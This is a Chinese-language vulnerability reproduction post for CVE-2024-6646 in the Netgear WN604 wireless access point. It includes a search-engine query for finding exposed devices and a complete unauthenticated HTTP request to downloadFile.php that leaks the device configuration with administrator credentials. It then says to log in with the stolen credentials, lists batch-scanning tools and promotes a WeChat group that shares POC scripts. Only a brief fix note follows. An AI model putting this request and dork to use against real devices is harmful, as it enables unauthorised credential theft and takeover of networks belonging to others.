【漏洞复现】Netgear WN604 downloadFile.php 信息泄露漏洞(CVE-2024-6646)

0x01 产品简介

NETGEAR WN604是一款由NETGEAR（网件）公司生产的无线接入器（或无线路由器）提供Wi-Fi保护协议（WPA2-PSK, WPA-PSK），以及有线等效加密（WEP）64位、128位和152位支持，保障网络安全。同时支持MAC地址认证、802.1x RADIUS以及EAP TLS、TTLS、PEAP等安全机制，进一步增强网络安全性。

0x02 漏洞概述

Netgear WN604 downloadFile.php接口处存在信息泄露漏洞，未经身份验证的远程攻击者可以利用此漏洞获取无线路由器的管理员账号密码信息，导致路由器后台被控，攻击者可对无线网络发起破坏或进一步威胁。

0x03 搜索引擎

title=="Netgear"

0x04 漏洞复现

GET /downloadFile.php?file=config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

利用泄露的账号密码登录系统

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子

0x06 修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://www.netgear.com/uk